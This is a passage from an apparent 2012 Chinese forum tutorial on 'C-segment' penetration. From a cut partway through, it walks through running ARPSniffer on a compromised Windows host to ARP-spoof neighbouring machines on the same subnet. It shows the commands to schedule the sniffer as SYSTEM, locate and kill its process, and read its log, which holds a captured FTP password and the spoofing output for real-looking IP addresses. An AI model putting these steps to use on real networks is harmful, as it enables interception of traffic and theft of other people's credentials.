C段渗透攻击技术

显示全部楼层 · 2012-4-1 19:15:10

LinkDE-528EthernetPCIAdapter

NetworkAdapter1:Intel(R)PRO/100+PCIAdapter(这个地方选第五个参数)

Usage:ArpSniffer<IP1><IP2><SnifferTCPPort><LogFile><NetAdp>[/RESET]

第五步:后台运行开始嗅探咯

C:\winnt\system32>at\\127.0.0.120:44c:\winnt\a.bat

注意:这儿的时间要用24小时式

arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

执行完第四步要先安装WINPCAP2.1驱动

同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:\winnt\system32>pulist

...................

conime.exe248NTAUTHORITY\SYSTEM

explorer.exe1864SMSCOMPUTER\Administrator

CSRSS.EXE2256NTAUTHORITY\SYSTEM

Arpsniffer.exe2322NTAUTHORITY\SYSTEM----就是它了!

WINLOGON.EXE2344NTAUTHORITY\SYSTEM

......................

杀了它

C:\winnt\system32>pskill2322

PsKillv1.03-localandremoteprocesskiller

Copyright(C)2000MarkRussinovich

http://www.sysinternals.com

Process2322killed.

C:\winnt\system32>type1.txt我的例子中嗅探的是FTP密码:)

...............

61.188.218.179(1404)->61.139.1.79(21)PASSaaabbb

61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.

61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.

61.188.218.179(1404)->61.139.1.79(21)QUIT

Get61.139.1.65HardwareAddress:00-00-0c-07-ac-02

Get61.139.1.79HardwareAddress:00-b0-d0-22-10-cb

Get61.139.1.88HardwareAddress:00-b0-d0-22-10-c6

Spoof61.139.1.79:Macof61.139.1.65===>Macof61.139.1.88

Spoof61.139.1.65:Macof61.139.1.79===>Macof61.139.1.88

有时这儿要先显示cannotopendriver(0)不管它等一下就可以了

BeginSniffer.........
*
*